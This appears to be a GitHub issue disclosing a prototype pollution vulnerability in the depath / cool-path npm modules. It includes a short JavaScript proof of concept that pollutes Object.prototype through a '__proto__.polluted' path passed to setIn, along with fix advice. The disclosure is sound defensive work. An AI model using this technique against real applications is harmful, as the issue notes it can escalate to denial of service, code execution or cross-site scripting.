Prototype pollution vulnerability affecting depath (cool-path) modules, versions *
mestrtee opened this issue · comments
Overview
The vulnerability located at setIn (lib/index.js:90)
. where set()
method
used to unsafely assign source property to the destination. An attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties __proto__
or constructor.prototype
.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.
PoC:
(async () => {
const lib = await import('depath');
// or const lib = await import('cool-path');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
// uncomment one at a time.
lib.Path.setIn ({}, "__proto__.polluted", true)
//lib.Path.ensureIn ({}, "__proto__.polluted", true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
How to prevent:
Assign or copy a property should only be applied an own property of the destination object, thus, check for that (e.g using hasOwnProperty) is sufficient. Alternatively, block the property names __proto__
or constructor
assigned. Other recommendations at Snyk.io:
https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b